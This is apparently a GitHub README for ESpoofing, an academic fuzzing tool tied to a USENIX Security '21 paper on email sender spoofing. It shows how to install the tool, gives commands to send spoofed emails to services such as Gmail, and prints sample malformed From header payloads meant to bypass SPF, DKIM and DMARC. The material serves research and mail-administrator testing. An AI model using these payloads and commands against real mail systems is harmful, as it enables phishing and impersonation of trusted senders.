• Stars
    star
    214
  • Rank 184,678 (Top 4 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created about 4 years ago
  • Updated almost 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A fuzzing tool for email sender spoofing attack. 👻

ESpoofing

ESpoofing is a fuzzing tool for email sender spoofing attack. This fuzzing tool can generate a number of test samples based on the ABNF grammar for authentication-related headers. Besides, we also provide an evaluation module to help email administrators to evaluate and increase their security.

Our research systematically analyzes the email delivery process based on the four key stages of authentication: sending authentication, receiving verification, forwarding verification and UI rendering.

As shown in the figure below, we define three types of email sender spoofing attacks: a. Shared MTA Attack, b. Direct MTA Attack. c. Forward MTA Attack. Furthermore, we found 14 email spoofing attacks capable of bypassing SPF, DKIM, DMARC, and user-interface protections.

Threat Model

By conducting a "cocktail" joint attack, a spoofing email can completely pass all prevalent email security protocols, and no security warning is shown on the receiver’s MUA. Therefore, it is challenging to identify whether such an email is spoofing, even for people with a senior technical background.

The following figure shows a spoofing example to impersonate [email protected] via Gmail. All the three email security protocols give "pass" verification results to the spoofing email.

Example

How to cite us

This tool is based on our latest research,"Weak Links in Authentication Chains: A Large-scale Analysis of Email Sender Spoofing Attacks", accepted at USENIX Security '21) .

If you want to cite us, please use the following (BibTeX) reference:

@inproceedings {shen21weaklinks,
	author = {Kaiwen Shen, Chuhan Wang, Xiaofeng Zheng, Minglei Guo, Chaoyi Lu, Baojun Liu, Yuxuan Zhao, Shuang Hao, Haixin Duan, Qingfeng Pan and Min Yang},
	title = {Weak Links in Authentication Chains: A Large-scale Analysis of Email Sender Spoofing Attacks},
	booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
	year = {2021},
	address = {Vancouver, B.C.},
	url = {https://www.usenix.org/conference/usenixsecurity21/presentation/shen-kaiwen},
	publisher = {{USENIX} Association},
	month = aug,
}

Install

  • Make sure have python3 installed in your computer.
  • Download this tool
git clone https://github.com/EmailTestTools/EmailTestTools.git
  • Install dependencies
sudo pip install -r requirements.txt

Set the default configuration in the config.yaml file.

Fuzzing

1. Generate malformed From headers.

pre_fuzz.py automatically grab the ABNF rules in the relevant email specifications and generate test samples according to the ABNF rules. Since common mail services usually refuse to handle emails with highly deformed headers, we have specified set certain values for our empirical experiment purposes. Besides, we also introduced the common mutation methods in the protocol fuzz, such as header repeating, inserting spaces, inserting Unicode characters, header encoding, and case variation Usage:

Short Form Long Form Description
-r --rfc The RFC number of the ABNF rule to be extracted.
-f --field The field to be fuzzed in ABNF rules.
-c --count The amount of ambiguity data that needs to be generated according to ABNF rules.

Example:

python3 pre_fuzz.py -r 5322 -f from -c 255

Screenshots:

screenshots

Generated Test Sample:

"From :,()<[email protected]>(comment),(\r\n)\r\n",
"From: <=?utf-8?RnJvbTp3b3Jkd29yZCgNCik8YXR0YWNrZXJAdG9wLmNvbT4sQWxpY2VAeW1haWwuY29tLHdlYm1hc3RlckBsaXZlLmNvbSxhZG1pbkBpY2xvdWQuY29tLHNlY3VyaXR5QHNvaHUuY29tDQo==?=>\u0000@attack.com",
"From: <=?utf-8?RnJvbTooY29tbQ0KZW50KTxockBtc24uY29tPix3b3Jkd29yZChoaSk8TWlrZUBhbGl5dW4uY29tPix3b3JkPGFkbWluQGhvdG1haWwuY29tPihoaSksd29yZHdvcmR3b3JkKCk8QHFxLmNvbTpAMTYzLmNvbTpzZWN1cml0eUBhbGl5dW4uY29tPihjb21tDQplbnQpDQo==?=>\u0000@attack.com",
"From:[email protected],(),,,word<[email protected]>\r\n",
" FrOM: <[email protected]>\r\nFrom:(comm\r\nent)<@qq.com:@163.com:[email protected]>,word<[email protected]>,word(comment)<[email protected]>(comm\r\nent)\r\n",
" Fromÿ: <[email protected]>\r\nFrom:[email protected]\r\n",
" Fromÿ: <[email protected]>\r\nFrom:(\r\n)<@gmail.com:@b.com:[email protected]>,word(comment)<@qq.com:@163.com:[email protected]>,<@a.com:@b.com:[email protected]>(comment)\r\n",
"From :,(\r\n),[email protected],word<[email protected]>(comm\r\nent),\r\n",
"From:()<@a.com:@b.com:[email protected]>(comm\r\nent)\r\n",
"From: <[email protected]>\r\nFrom:(comm\r\nent),[email protected]\r\n",
" From:,,(comment),[email protected],(hi)\r\n",
"From: ,<@gmail.com:@b.com:[email protected]>,(hi)<@gmail.com:@b.com:[email protected]>,(hi),,(),\r\n",
"From: (hi)<[email protected]>(),[email protected],word(comment)<@a.com:@b.com:[email protected]>(),word<[email protected]>(\r\n)\r\n",
" Fromÿ: <[email protected]>\r\nFrom:,[email protected],,(hi),,(),\r\n",
...

For more test samples, please check this file.

2. Send spoofing emails with malformed sender address

run_fuzz_test.py uses the generated samples to test the security verification logic of the target mail system. We also carefully control the message sending rate with intervals over 10 minutes to minimize the impact's target email services.

Usage:

Short Form Long Form Description
-m --mode The attack mode with spoofing emails (s: Shared MTA, d: Direct MTA)
-t --target Select target under attack mode.
-a --attack Select a specific attack method to send spoofing email.

Example:

For example, if you want to use Direct MTA to fuzz MIME From header, you can execute:

python3 run_fuzz_test.py -m d -t gmail -a A2.1

By the way, if you want to use Shared MTA , you need to configure email sending account in config/config.yaml.

3. Analyze and summarize the employed adversarial techniques

We analyze and summarize the employed adversarial techniques that make email sender spoofing successful in practice. We use spoofing.py to verify vulnerabilities in the real world.

Short Form Long Form Description
-m --mode The attack mode with spoofing emails (s: Shared MTA, d: Direct MTA)
-t --target Select target under attack mode.
-a --attack Select a specific attack method to send spoofing email.
--mail_from Set Mail From address manually. It will overwrite the settings in config.yaml
--mime_from Set Mime From address manually. It will overwrite the settings in config.yaml
--mail_to Set Mail To address manually. It will overwrite the settings in config.yaml
--mime_to Set Mime To address manually. It will overwrite the settings in config.yaml
python spoofing.py -m d -t default -a A1

Evaluation

We provide an evaluation tool to help email administrators to evaluate and strengthen their security. After configuring the target email system information, this tool try to interact with the target system and evaluate whether it is vulnerable to the attacks we found. For the vulnerable attacks, administrators can configure corresponding filtering rules to defend against attacks.

  • Configure the recipient address and your email sending account.

  • Just excute:

    python3 evaluate.py 

    The program uses both shared MTA and direct MTA methods to try to send forged emails to the recipient.

  • Check whether these emails are in the inbox of the recipient account.

The body of these forged emails contains detailed information about each header in email and corresponding defense measures, such as rejecting the letter, providing security warnings on the front end, etc. If a forged email enters the inbox of the target mail system, the administrator can easily understand the attack principle and take effective measures to defend it.

The following is an example of using this tool to evaluate the security of the target email system.

You can see that some spoofing emails have entered the inbox of the target email system. This means that the target system may be vulnerable to the corresponding attacks

list.png

You can get more information by reading the content of the email, including details of the attack and how to fix such vulnerabilities.

img/demo.png

Version

Current version is 2.0